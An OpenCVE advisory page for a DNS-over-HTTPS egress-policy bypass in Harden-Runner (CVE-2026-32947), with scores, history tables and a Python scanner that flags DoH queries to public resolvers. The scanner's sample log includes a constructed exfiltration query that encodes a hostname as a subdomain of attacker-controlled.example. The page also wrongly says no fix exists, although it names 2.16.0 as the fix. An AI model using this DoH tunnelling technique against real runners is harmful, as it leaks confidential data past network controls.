Description
Harden-Runner is a CI/CD security agent that works like an EDR for GitHub Actions runners. In versions 2.15.1 and below, a DNS over HTTPS (DoH) vulnerability allows attackers to bypass egress-policy: block network restrictions by tunneling exfiltrated data through permitted HTTPS endpoints like dns.google. The attack works by encoding sensitive data (e.g., the runner's hostname) as subdomains in DoH queries, which appear as legitimate HTTPS traffic to Harden-Runner's domain-based filtering but are ultimately forwarded to an attacker-controlled domain. This effectively enables data exfiltration without directly connecting to any blocked destination. Exploitation requires the attacker to already have code execution within the GitHub Actions workflow. The issue was fixed in version 2.16.0.
Published: 2026-03-20
Score: 4.6 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Data exfiltration via DNS over HTTPS bypassing egress policy
Action: Apply Patch
AI Analysis

Impact

Harden-Runner, the CI/CD security agent for GitHub Actions, contains a DoH vulnerability in versions 2.15.1 and earlier that lets an attacker encode sensitive data as subdomains in DNS over HTTPS queries. The queries go to a permitted HTTPS endpoint such as dns.google, pass through Harden-Runner's domain-based egress filtering, and are forwarded to an attacker-controlled domain, enabling exfiltration of data without connecting to a blocked destination. This weakness is associated with CWE-693, CWE-807, and CWE-863 and allows a breach of confidentiality by leaking information that should not leave the isolated network.

Affected Systems

StepSecurity Harden-Runner Community Tier, versions up to and including 2.15.1, is affected. The vulnerability was resolved in version 2.16.0. Any environment running a vulnerable Harden-Runner instance on GitHub Actions is at risk.

Risk and Exploitability

The CVSS score of 4.6 indicates moderate severity, while the EPSS score of less than 1% suggests a low probability of wide-scale exploitation. The vulnerability is not listed in CISA's KEV catalog. Exploitation requires existing code execution within the GitHub Actions workflow; the attacker then crafts DoH queries that appear legitimate. Because the attack uses standard HTTPS channels to a resolver that the policy already permits, defenses based solely on domain-based egress rules are ineffective against it. The overall risk is moderate but depends heavily on whether the runner is exposed to malicious workflow code.

Generated by OpenCVE AI on March 24, 2026 at 13:30 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Harden-Runner to version 2.16.0 or later
  • Verify that only trusted workflows run on runners that use Harden-Runner
  • If patching is delayed, monitor DNS traffic for DoH queries to external domains such as dns.google as a possible indicator of exfiltration
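As an added illustration of the third action (this is not code from the OpenCVE page or from Harden-Runner), the scanner below walks a constructed egress log, reports every DoH request to a known public resolver, and, when the queried name is visible in the URL, marks names whose labels look like encoded data. The log format, resolver list, thresholds and all hostnames are assumptions.

```python
import math
from urllib.parse import urlparse, parse_qs

# Constructed sample egress log (not from the advisory): one HTTPS request per line.
SAMPLE_LOG = """\
2026-03-20T10:00:01Z GET https://api.github.com/repos/example-org/app
2026-03-20T10:00:02Z GET https://dns.google/resolve?name=github.com&type=A
2026-03-20T10:00:03Z GET https://dns.google/dns-query?name=72756e6e65722d686f73742d3432.c2.attacker-controlled.example&type=A
2026-03-20T10:00:04Z GET https://pypi.org/simple/requests/
"""

# Assumed watch list of public DoH resolvers; dns.google is the one the advisory names.
DOH_RESOLVERS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}
DOH_PATHS = {"/resolve", "/dns-query"}

def shannon_entropy(s: str) -> float:
    """Bits per character; hex/base32 payload labels score higher than ordinary words."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def doh_query_name(url: str):
    """Return (is_doh, name). is_doh is True when the URL targets a watched resolver's
    DoH endpoint. name is the queried hostname if the JSON-API 'name=' form exposes it;
    the wire-format 'dns=' form carries it inside a binary DNS message, so name is None."""
    u = urlparse(url)
    if u.hostname not in DOH_RESOLVERS or u.path not in DOH_PATHS:
        return False, None
    return True, parse_qs(u.query).get("name", [None])[0]

def looks_encoded(name: str, max_label: int = 24, max_entropy: float = 3.5) -> bool:
    """Heuristic: any single label that is unusually long or unusually high-entropy."""
    return any(len(lbl) > max_label or (len(lbl) >= 8 and shannon_entropy(lbl) > max_entropy)
               for lbl in name.split("."))

def scan(log_text: str):
    """Return (timestamp, query_name, verdict) for each DoH request in the log.
    Plain DoH use is still worth logging, since the policy bypass rides on it."""
    findings = []
    for line in log_text.splitlines():
        ts, _method, url = line.split(" ", 2)
        is_doh, name = doh_query_name(url)
        if not is_doh:
            continue
        if name is None:
            verdict = "doh-query-opaque"   # needs the DNS message decoded to judge
        elif looks_encoded(name):
            verdict = "possible-exfil"
        else:
            verdict = "doh-query"
        findings.append((ts, name, verdict))
    return findings
```

The heuristic only inspects names that the URL exposes; wire-format requests and POST bodies are reported as opaque, and upgrading to 2.16.0 remains the actual fix.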


Advisories

Source       ID                   Title
Github GHSA  GHSA-46g3-37rh-v698  Egress Policy Bypass via DNS over HTTPS (DoH) in Harden-Runner (Community Tier)

History

Tue, 24 Mar 2026 12:45:00 +0000

Type                 Values Removed  Values Added
First Time appeared                  Stepsecurity
                                     Stepsecurity harden-runner
CPEs                                 cpe:2.3:a:stepsecurity:harden-runner:*:*:*:*:community:*:*:*
Vendors & Products                   Stepsecurity
                                     Stepsecurity harden-runner

Sat, 21 Mar 2026 05:30:00 +0000

Type        Values Removed         Values Added
Weaknesses                         CWE-807
References
Metrics     threat_severity: None  cvssV3_1: {'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}
                                   threat_severity: Moderate


Fri, 20 Mar 2026 16:15:00 +0000

Type     Values Removed  Values Added
Metrics                  ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 20 Mar 2026 09:00:00 +0000

Type                 Values Removed  Values Added
First Time appeared                  Step Security
                                     Step Security harden Runner
Vendors & Products                   Step Security
                                     Step Security harden Runner

Fri, 20 Mar 2026 04:45:00 +0000

Type         Values Removed  Values Added
Description                  Harden-Runner is a CI/CD security agent that works like an EDR for GitHub Actions runners. In versions 2.15.1 and below, a DNS over HTTPS (DoH) vulnerability allows attackers to bypass egress-policy: block network restrictions by tunneling exfiltrated data through permitted HTTPS endpoints like dns.google. The attack works by encoding sensitive data (e.g., the runner's hostname) as subdomains in DoH queries, which appear as legitimate HTTPS traffic to Harden-Runner's domain-based filtering but are ultimately forwarded to an attacker-controlled domain. This effectively enables data exfiltration without directly connecting to any blocked destination. Exploitation requires the attacker to already have code execution within the GitHub Actions workflow. The issue was fixed in version 2.16.0.
Title                        Egress Policy Bypass via DNS over HTTPS (DoH) in Harden-Runner (Community Tier)
Weaknesses                   CWE-693
                             CWE-863
References
Metrics                      cvssV4_0: {'score': 4.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N'}



MITRE

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2026-03-20T16:05:57.731Z
Reserved: 2026-03-17T00:05:53.284Z
Link: CVE-2026-32947

Vulnrichment

Updated: 2026-03-20T16:05:52.816Z

NVD

Status: Analyzed
Published: 2026-03-20T05:16:13.923
Modified: 2026-03-24T12:33:33.540
Link: CVE-2026-32947

Redhat

Severity: Moderate
Public Date: 2026-03-20T04:03:03Z
Links: CVE-2026-32947 - Bugzilla

OpenCVE Enrichment

Updated: 2026-03-25T14:09:22Z

Weaknesses